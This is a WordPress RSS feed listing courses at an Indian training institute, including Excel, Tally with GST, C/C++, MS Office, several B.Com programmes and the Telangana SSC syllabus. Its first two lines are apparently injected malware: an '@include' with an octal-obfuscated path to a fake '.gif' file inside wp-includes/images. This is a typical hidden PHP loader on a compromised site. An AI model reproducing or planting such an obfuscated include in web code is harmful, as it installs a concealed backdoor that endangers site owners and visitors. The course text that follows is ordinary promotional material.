@include "\57\150\157\155\145\57\144\165\163\153\71\163\152\163\70\156\66\171\57\160\165\142\154\151\143\137\150\164\155\154\57\154\145\147\145\156\144\151\156\163\164\151\164\165\164\145\56\151\156\57\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\153\170\157\150\64\60\56\147\151\146";
@include "\57\150\157\155\145\57\144\165\163\153\71\163\152\163\70\156\66\171\57\160\165\142\154\151\143\137\150\164\155\154\57\154\145\147\145\156\144\151\156\163\164\151\164\165\164\145\56\151\156\57\167\160\55\151\156\143\154\165\144\145\163\57\151\155\141\147\145\163\57\153\170\157\150\64\60\56\147\151\146";Courses – Legend Institute
Thu, 21 Nov 2019 09:56:42 +0900en-US
1 https://wordpress.org/?v=5.2.20http://www.legendinstitute.in/wp-content/uploads/2019/11/cropped-fevicon-32x32.pngCourses – Legend Institute
3232Advance Excel
http://www.legendinstitute.in/courses/advance-excel/#respondTue, 19 Nov 2019 07:16:20 +0000http://localhost/institute/?post_type=lp_course&p=2600Advanced Excel refers to features and functions of Microsoft Excel tool which helps the user to perform complex and large calculations, data processing on the huge amount of data, performing data analysis, better representation of data, etc.
http://www.legendinstitute.in/courses/advance-excel/feed/0Tally with GST & Taxation
http://www.legendinstitute.in/courses/tally-with-gst-taxation/#respondTue, 19 Nov 2019 07:14:47 +0000http://localhost/institute/?post_type=lp_course&p=2597GST is an Indirect Tax which has replaced many Indirect Taxes in India. The Goods and Service Tax Act was passed in the Parliament on 29th March 2017. The Act came into effect on 1st July 2017; Goods & Services Tax Law in India is a comprehensive, multi-stage, destination-based tax that is levied on every value addition.
]]>http://www.legendinstitute.in/courses/tally-with-gst-taxation/feed/0C, C++
http://www.legendinstitute.in/courses/c-c/#respondTue, 19 Nov 2019 07:07:30 +0000http://localhost/institute/?post_type=lp_course&p=2594C++, pronounced “C plus plus,” is a programming language that was built off the C language. The syntax of C++ is nearly identical to C, but it has object-oriented features, which allow the programmer to create objects within the code.
]]>http://www.legendinstitute.in/courses/c-c/feed/0MS Office
http://www.legendinstitute.in/courses/ms-office/#respondTue, 19 Nov 2019 07:04:10 +0000http://localhost/institute/?post_type=lp_course&p=2591Microsoft Office is a suite of desktop productivity applications that is designed specifically to be used for office or business use. It is a proprietary product of Microsoft Corporation and was first released in 1990.
]]>http://www.legendinstitute.in/courses/ms-office/feed/0B.COM ( Computer Applications)
http://www.legendinstitute.in/courses/b-com-computer-applications/#respondMon, 18 Nov 2019 13:08:19 +0000http://localhost/institute/?post_type=lp_course&p=2504B.Com. in Computer Applications is a 3- year undergraduate course designed to impart advanced learning to students in the discipline of Commerce, particularly involving the application of software technology for professional requirements, merging the academic specialties of Commerce and Computer Applications The course follows an innovative modern curriculum
]]>http://www.legendinstitute.in/courses/b-com-computer-applications/feed/0B.COM ( Foreign Trade )
http://www.legendinstitute.in/courses/b-com-foreign-trade/#respondMon, 18 Nov 2019 13:07:51 +0000http://localhost/institute/?post_type=lp_course&p=2502B.Com. in Foreign Trade Management is a 3-year undergraduate program involving an advanced study of economics, business, accounts, and their management. The course’s ambit includes accounting of expenditure, management of resources, study of business relations, and management of trade flow, among others.
]]>http://www.legendinstitute.in/courses/b-com-foreign-trade/feed/0B.COM ( Honours)
http://www.legendinstitute.in/courses/b-com-bachelor-of-commerce-honours/#respondMon, 18 Nov 2019 13:07:15 +0000http://localhost/institute/?post_type=lp_course&p=2495Graduates can pursue higher education and other career oriented programs globally.
Graduates have wider scope of employment opportunities in the field of Finance, Banking, Insurance, Accounting, Taxation and Research.
]]>http://www.legendinstitute.in/courses/b-com-bachelor-of-commerce-honours/feed/0B.COM (General)
http://www.legendinstitute.in/courses/b-com-general/#respondMon, 18 Nov 2019 11:14:48 +0000http://localhost/institute/?post_type=lp_course&p=2488 B.Com is focused on imparting strong subject-matter expertise to students in basic theories, principles, methods and procedures of commerce and accounting. It makes students aware of social, economic and political problems relating to business concerns and helps in applying economic principles while making business decisions.
]]>http://www.legendinstitute.in/courses/b-com-general/feed/0B.COM (Computer)
http://www.legendinstitute.in/courses/b-com-computer/#respondMon, 18 Nov 2019 11:09:14 +0000http://localhost/institute/?post_type=lp_course&p=2485In today’s practical world use of computers and information technology are presumed to be critical in planning, Controlling and decision making activities to make business effective.The 3 year programme offers a wide range of curriculum in all facets of accounting and finance.
]]>http://www.legendinstitute.in/courses/b-com-computer/feed/0SSC (Telangana Syllabus only)
http://www.legendinstitute.in/courses/ssc-telangana-syllabus-only/#commentsThu, 17 Oct 2019 11:55:01 +0000https://radiustheme.com/demo/wordpress/eikra/?post_type=lp_course&p=200Telangana SSC Syllabus 2020- Students preparing for the Telangana Class 10th exams can check the complete TS SSC syllabus 2020 for exam preparation. With the help of Telangana SSC syllabus, students can easily make a study plan for themselves. Students can also figure out the time required for each subject. Direct links to download Telangana SSC syllabus 2020 in PDF form is given in this article. Students can have a basic idea of the contents of each subject by going through the Telangana SSC syllabus 2020. Students have around 5 months left for the exam as Telangana SSC exam will be held in the month of March 2020. Plan your studies accordingly in the due time to pass this examination with high scores.
As per the prescribed Telangana SSC syllabus 2020, there are 3 language papers and 6 non – language papers, which are Maths, Science and Social Science. Total marks for each language paper will be 100, for other subjects each paper will be of 50 marks. Read the complete article to check subject wise Telangana SSC syllabus 2020 and marking scheme.